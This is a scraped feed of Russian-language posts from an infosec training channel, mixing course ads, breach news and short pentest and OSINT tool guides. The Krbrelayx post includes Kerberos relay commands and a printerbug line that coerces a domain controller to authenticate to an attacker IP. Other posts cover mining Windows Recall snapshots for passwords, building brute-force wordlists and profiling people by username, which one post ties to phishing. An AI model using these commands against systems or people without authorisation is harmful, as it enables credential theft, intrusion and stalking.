34787
Крупнейшее ИБ сообщество ру-сегмента Чат: @codeby_one Форум: codeby.net Обучение: codeby.school Пентест: codeby.one CTF: codeby.games VK: vk.com/codeby YT: clck.ru/XG99c Сотрудничество: @KinWiz Номер заявления для регистрации канала в РКН: 5035340278
WhatsMyName: как найти цифровой след человека за пару кликов 🔍
WhatsMyName — это OSINT-инструмент, который позволяет быстро проверить, на каких онлайн-платформах используется конкретное имя пользователя.
Без взлома. Без магии. Только открытые данные — и плохие привычки пользователей.
❓ Что делает WhatsMyName
Инструмент проверяет сотни сайтов: соцсети, форумы, хостинги кода, сервисы для разработчиков, маркетплейсы и нишевые площадки.
Ты вводишь ник — сервис проверяет, зарегистрирован ли он на известных платформах.
Результат — список ресурсов, где этот username уже занят или существует.
И этого более чем достаточно, чтобы начать раскрутку личности.
Через WhatsMyName можно:
➡️ связать аккаунты человека на разных платформах
➡️ найти старые или забытые профили
➡️ определить интересы, профессию, хобби
➡️ подготовить фишинговую атаку или социальную инженерию
➡️ собрать профиль цели для дальнейшего OSINT
Для пентестера — инструмент.
Для журналиста — источник.
Для сталкера — оружие.
Для обычного пользователя — повод задуматься.
🟧🟧🟧 –20% на два курса по промокоду COMBO20 до 19 декабря!
➡️ Все наши каналы 💬Все наши чаты ⚡️ Чат с менеджером
🟠Цифровая интимность на витрине. Компрометация PornHub ⚫️
Хакерская группировка ShinyHunters заявила о компрометации данных ≈200 миллионов пользователей Pornhub, сообщает Reuters. Злоумышленники требуют выкуп в биткоинах, угрожая публикацией информации в открытом доступе.
ShinyHunters — одна из самых известных киберпреступных группировок, специализирующихся на кражах и продаже баз данных, вымогательстве и массовых утечках персональных данных. Активны как минимум с 2020 года и за это время стали синонимом крупных data breach-инцидентов. Деятельность данной группировки связывают с утечками данных: Tokopedia, Wattpad, Pixlr, Wishbone, Mathway, HomeChef.
SSLScan: Инструмент для аудита SSL/TLS конфигураций
SSLScan — это утилита командной строки, предназначенная для глубокого анализа конфигурации SSL/TLS на удаленных серверах. Его основная задача — проверка поддерживаемых протоколов, шифров и выявление устаревших или небезопасных настроек путем установки соединений с целевым хостом. В отличие от ручной проверки, SSLScan предоставляет структурированный и полный отчет о состоянии безопасности криптографических протоколов сервера.
sudo apt install sslscanПроверка
sslscan -h
sslscan example.comЭта команда выполнит все основные проверки для домена example.com на стандартном порту 443
sslscan example.com:8443Полезно для проверки нестандартных HTTPS-портов, часто используемых в API или внутренних сервисах
sslscan --tls13 --tls12 example.com
sslscan --no-cipher-details --no-renegotiation --no-compression --no-fallback example.comОпция --no-cipher-details ускоряет сканирование, пропуская детальный анализ каждого шифра
sslscan --xml=report.xml example.com
Krbrelayx: Инструментарий для исследования и эксплуатации Kerberos в Active Directory
Krbrelayx — это набор инструментов на языке Python, разработанный для демонстрации и проверки уязвимостей, связанных с протоколом Kerberos и службой каталогов Active Directory. Основное внимание уделяется техникам спуфинга и ретрансляции, которые могут позволить злоумышленнику получить несанкционированный доступ или повысить привилегии в корпоративной среде.
sudo apt install krbrelayx
krbrelayx -h
cd krbrelayx
pip install -r requirements.txt
krbrelayx -t ldap://dc02.domain.local # Он будет ожидать входящих соединений Kerberos и ретранслировать их на целевой сервер (например, файловый ресурс)
printerbug domain.local/dc01\$@dc01.domain.local Attacker_IP # Аутентифицироваться на указанном IP атакующего (Attacker_IP) под учетной записью компьютера dc01$
krbrelayx -t ldap://dc01.corp.local -wh wpad.corp.local -wa 2
Namechk: Ваш Шерлок Холмс в мире цифровых следов и как защититься от его "темной стороны"
🔍Открытые данные — это пазл, который можно собрать в целостную картину о человеке или компании. Инструменты вроде Namechk превращают поиск по никнейму из рутинной задачи в мощный метод цифровой разведки.
Наша статья — практическое руководство по использованию OSINT (разведки по открытым источникам) для специалистов по безопасности и всех, кто хочет лучше защитить свои данные.
Вы узнаете, как:
💠Быстро находить профили по никнейму — автоматизируйте проверку сотен платформ за минуту. Узнаете, где ваш «старый» аккаунт уже фигурирует в слитых базах, и как это используют для фишинга и социальной инженерии.
💠Снизить риски кибератак — защитите бренд от фейков и клонов. Научитесь выявлять поддельные корпоративные аккаунты и страницы ключевых сотрудников, созданные для мошенничества.
💠Проводить аудит своей цифровой уязвимости — получите пошаговый метод, как оценить, что о вас или вашей компании знают в сети. Поймёте, какую информацию стоит скрыть, чтобы минимизировать риски.
Хотите погрузиться в тему глубже и начать применять OSINT на практике? 📌Читайте полную статью с детальными инструкциями и реальными примерами.
↖️Готовы превратить отдельные инструменты OSINT в цельное расследование? Ждём вас на курсе «OSINT: технология боевой разведки». Старт 26 января!
🟧🟧🟧 –20% на два курса по промокоду COMBO20 до 19 декабря!
➡️ Все наши каналы 💬Все наши чаты ⚡️ Чат с менеджером
👀 TotalRecall
Инструмент извлекает и отображает данные из Windows Recall, предоставляя удобный способ доступа к информации о снимках активности вашего ПК.
Windows Recall — это функция Microsoft, впервые представленная в 2024 году, которая автоматически делает снимки того, что происходит на экране ПК каждые пять секунд, если содержимое экрана отличается от предыдущего снимка, и сохраняет их в локальной базе данных.
Функция Recall позволяет искать контент, включая изображения и текст, с помощью естественного языка. Является частью экосистемы Copilot+ PC и интегрирована в Windows 11 и новую AI-платформу Microsoft.
C:\Users\$USER\AppData\Local\CoreAIPlatform.00\UKP\{GUID}.\ImageStore\. totalrecall.py [-h] [--from_date FROM_DATE] [--to_date TO_DATE] [--search SEARCH]
totalrecall.py --search password --from_date 2024-06-04 --to_date 2024-06-05
BBOT — мощный автоматизированный сканер для Recon, Bug Bounty и ASM
BBOT — мультифункциональный сканер, вдохновлённый Spiderfoot, созданный для автоматизации разведки, поиска поддоменов, web-сканирования и анализа атакуемой поверхности. Инструмент сочетает мощные модули, находит значительно больше данных, чем классические OSINT-инструменты, и масштабируется под любые задачи.
pipx install bbot
# dev-ветка:
pipx install --pip-args '--pre' bbot
bbot -t evilcorp.com -p subdomain-enum
bbot -t evilcorp.com -p spider
bbot -t evilcorp.com -p email-enum
bbot -t www.evilcorp.com -p web-basic
bbot -t evilcorp.com -p kitchen-sink --allow-deadly
🎄 Что подарить на Новый год тому, кто в теме? В Академии Кодебай открылись продажи новогодних подарочных сертификатов!
Если вы ищете подарок, который действительно имеет ценность — мы создали его.
Теперь вы можете подарить близкому человеку не вещь, а возможность изменить профессию, усилить навыки и выйти на новый уровень.
🎁 Премиальный подарок для будущего профессионала.
🎁 Практичный выбор для тех, кто ценит развитие.
🎁 Подарок с долгосрочной ценностью.
Выберите формат:
↖️ Сертификат на один курс
↖️ Сертификат-номинал
Получатель сам выбирает направление обучения: от веб-пентеста и SOC до самых свежих новинок — DevSecOps и Appsec-инженер!
Сертификат приходит на e-mail в виде стильного PDF, который можно красиво вручить лично или отправить онлайн.
⬇️ Продажи уже открыты.
🛠 В данный момент платформа подвергается беспрецедентной целенаправленной DDoS-атаке.
➡️Мы продолжаем работы по стабилизации и планируем запустить соревнования в 18:00 МСК. Продолжительность соревнований будет скорректирована - никто не потеряет игровое время.
🎁 Все участники получат приятные бонусы.
Благодарим за терпение и понимание ❤️
⚒️ Утечка данных в Leroy Merlin: клиенты снова на линии огня
Французский ритейлер Leroy Merlin сообщил клиентам о новом инциденте безопасности — и да, снова персональные данные утекли туда, куда не должны были. На этот раз жертвами стали пользователи из Франции, а сама атака, по словам компании, была «точечной, но неприятной».
Информация о произошедшем появилась после того, как пользователь SaxX_ опубликовал в X фрагменты уведомления, разосланного клиентам. Согласно документу, злоумышленники сумели получить доступ к целому набору данных, которые обычно собирают маркетологи, но обожают киберпреступники:
🔴полное имя
🔴номер телефона
🔴электронная почта
🔴почтовый адрес
🔴дата рождения
🔴данные из программы лояльности
То есть полный пакет для фишинговых атак, подмены личности и прочей социальной инженерии, которая в последнее время стала хитом среди злоумышленников.
В обращении компания признаёт факт взлома:
«Недавно на нашу информационную систему была совершена кибератака, и часть ваших персональных данных могла быть скомпрометирована. Как только инцидент был обнаружен, мы заблокировали несанкционированный доступ и локализовали угрозу».
Metis — AI-driven инструмент для глубокого анализа безопасности кода
Metis — инструмент от Arm для анализа безопасности кода. Это open-source решение с ИИ-движком, которое помогает находить скрытые уязвимости, снижать нагрузку на ревьюеров и упрощать разбор сложных или устаревших кодовых баз.
git clone https://github.com/arm/metis.git
cd metis
pip install -r requirements.txt
python3 metis.py --source /path/to/codebase
python3 metis.py --source . --output report.json
Threat Hunting
🏹 Threat Hunting (охота за угрозами) — это проактивный, систематический и итеративный процесс активного поиска скрытых киберугроз и следов компрометации в IT-инфраструктуре, которые не были обнаружены стандартными автоматическими средствами защиты (например, SIEM, IDS/IPS).
❗️ Его суть — не ждать срабатывания алертов, а активно искать признаки вредоносной активности, используя опыт, знания и аналитику.
Основные характеристики
🔺 Проактивность: специалист не ждет инцидентов, а самостоятельно формирует гипотезы о возможных способах проникновения и действиях злоумышленников в сети.
🔺 Итеративность: процесс включает многократное выдвижение и проверку гипотез. Если первоначальная гипотеза не подтвердилась, она модифицируется и тестируется снова.
🔺 Телеметрия: анализируются данные, собираемые с конечных точек, сетевых сенсоров, журналов безопасности и прочих источников.
🔺 Использование Threat Intelligence: специалисты применяют актуальную информацию о тактиках, техниках и процедурах (TTP) известных атакующих, индикаторы компрометации (IOC), чтобы направлять свои поиски.
🎯 Цель — выявить скрытые проникновения, сложные целевые атаки (APT), которые могут длительное время оставаться незамеченными традиционными средствами, особенно когда атаки распределены во времени и замаскированы.
➡️ Результат — сокращение времени выявления инцидентов, повышение уровня защиты и понимания инфраструктуры.
В общем виде процесс Threat Hunting:
🔺 Формирование гипотезы на основе знаний о современных угрозах и особенностях инфраструктуры.
🔺 Поиск следов активности или аномалий с помощью анализа телеметрии.
🔺 Проверка и подтверждение гипотезы, выявление угроз.
🔺 Обратная связь и обновление гипотез при получении новых данных.
❓ Как часто используете процессы Threat Hunting в своей работе?
🟧🟧🟧 –20% на два курса по промокоду COMBO20 до 19 декабря!
➡️ Все наши каналы 💬Все наши чаты ⚡️ Чат с менеджером
Pydictor
Мощный и полезный конструктор хакерских словарей для Bruteforce.
Он не только умеет создавать продвинутые словари паролей, но и предлагает полезные функции по их обработке: объединение, удаление дубликатов, фильтрация и т.д.
📕Характеристики:
➖Генерация 7 типов словарей: базовые, с пользовательским набором символов, комбинаторика и др.
➖8 утилит для работы со словарями: объединение, удаление дубликатов, сравнение, подсчёт частот и пр.
➖Поддержка 6 специализированных словарей: по дате рождения, ID, FTP-паролям и т.д.
➖Встроенные методы кодирования и хеширования: base64, md5, sha и др.
➖Гибкая фильтрация по длине, регуляркам, типам символов и другим критериям
💻Установка:
git clone https://github.com/LandGrey/pydictor
cd pydictor
python pydictor.py -base L --len 2 3 --encode b64
python pydictor.py -base dLc --len 1 3 -o /awesome/pwd
python pydictor.py -char "asdf123._@ " --len 1 3 --tail @site.com
В ИБ многие навыки усиливают друг друга, и обучение в связке даёт заметно более быстрый прогресс.
Поэтому до 19 декабря мы дарим промокод COMBO20, по которому можно взять любые два курса со скидкой –20%.
Это хороший вариант тем, кто хочет закрыть смежные навыки сразу.
〰️〰️ Атака + защита? Легко.
〰️〰️ Основа + углубление? Ещё проще.
〰️〰️ Закрыть пробелы и победить в CTF? Тоже можно.
Любые два курса можно комбинировать — комбо работает на все направления! Отправляйте промокод менеджеру и начинайте учиться сейчас!
⚡️ Чат с менеджером
Cortex
🧠 Cortex — это платформа автоматизации и оркестрации безопасности класса SOAR (Security Orchestration, Automation, and Response), которая позволяет значительно повысить эффективность работы SOC и команд реагирования на инциденты.
Основные возможности Cortex:
🔺 Автоматизация процессов реагирования на инциденты за счет сценариев (playbook), которые могут запускать анализ, принимать решения и выполнять коррекционные действия без участия аналитиков.
🔺 Оркестрация различных инструментов безопасности: NGFW, EDR/XDR, DLP, Sandbox и др. Позволяет интегрировать разные системы в единый процесс.
🔺 Аналитика и классификация инцидентов с автоматическим отсеиванием ложных срабатываний и назначением приоритетов.
🔺 Гибкая поддержка скриптов на Python, JavaScript и PowerShell для создания кастомных автоматизированных действий.
🔺 Встроенный «помощник» для создания скриптов, что облегчает использование платформы даже специалистам с базовыми навыками программирования.
🔺 Единая консоль для управления инцидентами с возможностью изолировать конечные точки, запускать корреляционные процедуры и документировать расследования.
🔺 Возможность генерации тестовых инцидентов для отработки процедур и тренировок команды.
🔺 Поддержка интеграций со многими решениями Palo Alto Networks и сторонними продуктами безопасности.
🖥 Cortex активно используют совместно с другими платформами, как обогащение инцидентов. Происходит это следующим образом:
🔺 При регистрации инцидента автоматически запускается playbook, который параллельно выполняет множество действий по обогащению.
🔺 Выполняется проверка артефактов (файлов, хэшей, IP-адресов, доменов) в различных системах и сервисах, таких как VirusTotal, платформы Threat Intelligence, SIEM и др.
🔺 Производится анализ логов на наличие индикаторов компрометации (IoC), собирается дополнительная информация об активности на связанных хостах и учетных записях.
🔺 Полученные данные добавляются в карточку инцидента, что позволяет видеть полный контекст и принимать обоснованные решения.
🔺 Обогащение помогает либо подтвердить ложные срабатывания, либо выявить расширенные последствия и масштаб инцидента.
📌 А как вы используете Cortex в своей работе?
🟧🟧🟧 –20% на два курса по промокоду COMBO20 до 19 декабря!
➡️ Все наши каналы 💬Все наши чаты ⚡️ Чат с менеджером
CloakQuest3r
CloakQuest3r — это мощный инструмент на Python, тщательно разработанный для раскрытия истинного IP-адреса веб-сайтов, защищённых Cloudflare и другими альтернативными сервисами, широко распространённым сервисом веб-безопасности и повышения производительности. Его основная задача — точно определить фактический IP-адрес веб-серверов, скрытых за защитой Cloudflare. Сканирование поддоменов является ключевым методом решения этой задачи. Этот инструмент — бесценный ресурс для тестировщиков на проникновение, специалистов по безопасности и веб-администраторов, стремящихся провести комплексную оценку безопасности и выявить уязвимости, которые могут быть скрыты мерами безопасности Cloudflare.
📕Характеристика:
➖Обнаружение реального IP-адреса: CloakQuest3r превосходно определяет реальные IP-адреса веб-серверов, использующих сервисы Cloudflare.
➖Сканирование поддоменов: Сканирование поддоменов является основополагающим компонентом процесса определения реального IP-адреса. Оно помогает определить фактический сервер, ответственный за размещение веб-сайта и связанных с ним поддоменов.
➖История IP-адресов: Извлекает историческую информацию об IP-адресах для заданного домена.
➖Анализ SSL-сертификата: Извлекает и анализирует SSL-сертификаты, связанные с целевым доменом.
Поточное сканирование: Для повышения эффективности и ускорения процесса определения реального IP-адреса CloakQuest3r использует многопоточность.
💻Установка:
git clone https://github.com/spyboy-productions/CloakQuest3r.git
cd CloakQuest3r
python cloakquest3r.py example.com
Mailcat
Mailcat - Найдите существующие адреса электронной почты по нику, используя методы проверки API/SMTP без уведомления пользователя.
📕Характеристики:
➖Удобный интерфейс
➖Поддержка tor
➖Поддержка proxy
💻Установка:
git clone https://github.com/sharsil/mailcat.git
cd mailcat
pip3 install -r requirements.txt --break-system-packages
python3 mailcat.py <NICKNAME>
python3 mailcat.py --tor <NICKNAME>
proxychains4 -q python3 mailcat.py <NICKNAME>
python3 mailcat.py <NICKNAME> --proxy http://127.0.0.1:8080
🔔 Python стал универсальным инструментом, который снимает рутину с пентестера и ускоряет работу.
Посмотрим, как это происходит на практике. ⬆️
🟧 uncover
Инструмент, использующий API известных поисковых систем для быстрого обнаружения открытых хостов в интернете.
Обладает следующими характеристиками
🟧Одновременный запрос к нескольким поисковым системам;
🟧Поддержка доступных поисковых систем: Shodan, Censys, FOFA, Hunter, Quake, ZoomEye, Netlas, CriminalIP, PublicWWW, HunterHow, Google, Onyphe, Driftnet;
🟧Поддерживает ввод нескольких ключей API;
🟧Автоматическая рандомизация ключей API;
🟧Вывод uncover можно перенаправить в другие проекты в рамках рабочего процесса, принимающие stdin в качестве входных данных (например, uncover -q example -f ip | naabu).
Для успешной установки требуется go1.21.
go install -v github.com/projectdiscovery/uncover/cmd/uncover@latest
$CONFIG/uncover/provider-config.yaml. Пример данного файла представлен ниже:echo 'ssl:"Uber Technologies, Inc."' | uncover
echo jira | uncover -e shodan,censys,fofa,quake,hunter,zoomeye,netlas,criminalip,driftnet
echo 8.8.8.8/20 | uncover -e driftnet
uncover -q http.title:GitLab -silent | httpx -silent
Findsploit
Finsploit — это простой bash-скрипт для быстрого и лёгкого поиска по локальным и онлайн-базам данных эксплойтов. Этот репозиторий также включает в себя «copysploit» для копирования любого эксплойта exploit-db в текущий каталог и «compilesploit» для автоматической компиляции и запуска любого эксплойта на языке C.
💻Установка:
git clone https://github.com/1N3/Findsploit.git
cd Findsploit
./findsploit
./findsploit <WORD> (например apache)
./findsploit <WORD> <WORD>
./findsploit exploits
🟧🟧🟧🟧 Мы запускаем флагманскую программу по Application Security!
AppSec — одно из самых востребованных и быстрорастущих направлений в кибербезопасности.
И теперь у нас есть полный 7-месячный практический курс, который готовит к работе в реальных проектах — от поиска уязвимостей до внедрения безопасного SDLC и DevSecOps.
Что ждёт на программе?
🟧 200+ часов практики
🟧 Личный стенд: SQLi, XSS, SSRF, LFI, IDOR, Race Condition и др.
🟧 Работа с SAST (Semgrep), DAST (Burp/ZAP/OAST), SCA (Trivy)
🟧 Secure SDLC, Threat Modeling, CVE/CWE/CVSS
🟧 Автоматизация безопасности в CI/CD
🟧 Финальный capstone: mini-CTF, созданный своими руками
🟧 Большое портфолио из 9 проектов, закрывающее требования junior-вакансий
🎓 По итогам — диплом о профпереквалификации и готовность выйти на рынок как:
Junior/Middle AppSec Engineer, Web-Pentester, Security Developer, DevSecOps-инженер.
Старт: 16 февраля
🟧🟧🟧 Первый поток доступен со скидкой 10%: 120.000 руб. 108.000 руб.
Набор открыт:
🟧 https://codeby.school/appsec.html
Б — безопасность, значит, д — доверие.
В VK специалисты ИБ создают защиту, которая работает незаметно, но надёжно. Узнайте из первых уст, как строится их работа. Переходите по ссылке — читайте про цели, миссию и команду, которая стоит на страже цифрового пространства.
🟧Короткий разбор, как работает MFA и почему разные способы защиты дают разный уровень безопасности.
А какой метод используете вы — и считаете ли его достаточно надёжным?
🚩 Соревнования начались!
Всем участникам желаем удачи и ярких эмоций ❤️
➡️ https://hackerlab.pro/cybercoliseum
———————————————
Следить за ходом соревнований без регистрации можно по ссылке: https://hackerlab.pro/scoreboard
PatchLeaks: Анализ патчей и обновлений через веб-интерфейс
PatchLeaks — это серверный инструмент, написанный на языке Go, предназначенный для анализа патчей, обновлений безопасности и связанных данных через веб-интерфейс. Он использует многопоточную обработку с элементами искусственного интеллекта для глубокого изучения предоставленной информации. Инструмент запускается как автономный веб-сервер, предоставляя исследователям и аналитикам платформу для интерактивного анализа изменений в обновлениях ПО, выявления скрытых модификаций и потенциальных уязвимостей.
sudo apt install patchleaks
go mod download
go build -o patchleaks .
patchleaks -h
patchleaks
patchleaks -host "0.0.0.0" -p 8080 -t 4
Google В С Ё
Член комитета Госдумы по информационной политике Андрей Свинцов допустил, что в России под ограничения могут попасть все сервисы Google.
В Госдуме допустили возможность блокировки абсолютно всех сервисов Google в России, объясняя это необходимостью защиты государственности и соблюдения закона о хранении персональных данных.
По словам депутата, причиной потенциальных ограничений является то, что Google продолжает хранить персональные данные пользователей за пределами России, в том числе в Европе и США. Свинцов считает, что это создает значимые риски, поскольку российский бизнес широко использует иностранные облачные сервисы и размещает там сведения о финансовом состоянии, выпускаемой продукции, технологиях, оборудовании, сервисных контрактах и финансовых операциях.
Свинцов также заявил, что в России сформировалась тенденция «мягкого выдавливания всего американского». По его мнению, если государство намерено «сохранить нашу экономику» и «сохранить нашу государственность», необходимо учитывать любые аспекты зависимости от зарубежной цифровой инфраструктуры, включая популярные иностранные онлайн-сервисы.
При этом парламентарий признал, что российский бизнес за многие годы выстроил системы управления на базе сервисов Google и привык к ним. Однако он подчеркнул, что, «я вам гарантирую на 100%, что огромное количество российских IT-решений ничем не уступают западным», а часть из них, будучи более современными, даже превосходит зарубежные аналоги по качеству. По словам Свинцова, некоторые отечественные решения еще нуждаются в доработке, но этот процесс оценивается не в годы, а в сроки порядка нескольких месяцев.
Депутат назвал текущий курс на замещение иностранных платформ «абсолютно правильной тенденцией» «мягкого выдавливания всего американского с территории Российской Федерации». Он не исключил, что сервисы Google и другие зарубежные платформы могут в перспективе постепенно сталкиваться с замедлением работы и усложнением доступа, чтобы у граждан и компаний был переходный период для миграции на российские аналоги.
Источник:https://www.gazeta.ru/tech/news/2025/12/11/27388915.shtml?utm_auth=false
🟧🟧🟧 –20% на два курса по промокоду COMBO20 до 19 декабря!
➡️ Все наши каналы 💬Все наши чаты ⚡️ Чат с менеджером
🥷 Прячем данные в графе IDA
🔗 Ссылка на утилиту: https://github.com/xoreaxeaxeax/REpsych/tree/master
#ida #полезное
➡️ Все наши каналы 💬 Все наши чаты
🟧Его путь начался не с преступления, а с любопытства. Будучи подростком в 1980-х, Поулсен, как и многие пионеры цифровой эры, изучал мир. Но его талант к проникновению в системы быстро перерос хобби. В 1983 году, в возрасте 17 лет, он под псевдонимом Dark Dante совершил символичный прорыв — взломал сеть ARPANET, экспериментальный проект Министерства обороны США, из которого позже вырос интернет.
Его поймали, но суд над несовершеннолетним был бы слишком громким процессом, и ему вынесли лишь предупреждение. Это была первая и последняя снисходительность системы по отношению к нему.
Началась жизнь в бегах, которая продлится
17 месяцев
. Но это не была жизнь в затворничестве. Это была жизнь хакера-призрака, который атаковал из тени.
История о «хакере, укравшем Porsche», облетела Америку, сделав «Тёмного Данте» народной легендой. Но за этим каскадерским трюком скрывалась куда более мрачная деятельность.
На тот момент это был самый длинный тюремный срок в США за компьютерные преступления. Дополнительным ударом стал запрет на использование компьютеров в течение
3 лет
после освобождения.
Сегодня
SecureDrop
используется
The New York Times, The Guardian, ProPublica
и другими ведущими изданиями, став щитом для правды в цифровую эпоху.
🔍 SploitScan
Мощный и удобный инструмент, предназначенный для упрощения процесса поиска эксплойтов для известных уязвимостей и определения вероятности их использования. Особенно полезен для специалистов, которые хотят усилить меры безопасности или разработать надежные стратегии обнаружения новых угроз.
git clone https://github.com/xaitax/SploitScan.git
cd sploitscan
pip install -r requirements.txt
sploitscan CVE-2024-1709 CVE-2024-21413
sploitscan.py --ai openai CVE-2024-21413
sploitscan -k "Outlook Express"
sploitscan CVE-2024-1709 --fast-mode
sploitscan --import-file path/to/yourfile.nessus --type nessus
sploitscan CVE-2024-1709 -m cisa,epss
Обнаружение шпионского ПО: руководство для ИБ-профессионалов
Вы уверены, что ваши данные в безопасности? Пока вы читаете этот текст, шпионское ПО может тихо сливать конфиденциальную информацию или отслеживать каждый ваш шаг в сети.
Мы подготовили для специалистов по безопасности исчерпывающее практическое руководство по борьбе со скрытой угрозой ⬇️
В статье расскажем:
💠Эволюция угрозы: от кейлоггеров до фреймворков вроде Pegasus с zero‑day уязвимостями.
💠Анатомия врага: Разберем классификацию шпионского ПО (кейлоггеры, инфостилеры, сталкервары) и изучим сложные механизмы его проникновения
💠Практическая лаборатория: методы обнаружения от IOC до анализа в контролируемой среде. Разберем реальные кейсы и инструменты
💠Стратегии защиты: многоуровневая оборона от классических решений до поведенческого анализа с ИИ. Рассмотрим «гигиену» безопасности и критическую роль обучения пользователей.
💠Этика и закон: грань между легальным анализом и нарушением законодательства, моральные дилеммы ИБ‑специалистов.
🔘Эта статья поможет не только обнаружить "шпиона", но и создать среду, где ему сложно закрепиться.
Если вы хотите углубиться в тему — читайте ➡️ полную статью и превратите свои знания в надёжный щит для данных
➡️ Все наши каналы 💬Все наши чаты ⚡️ Чат с менеджером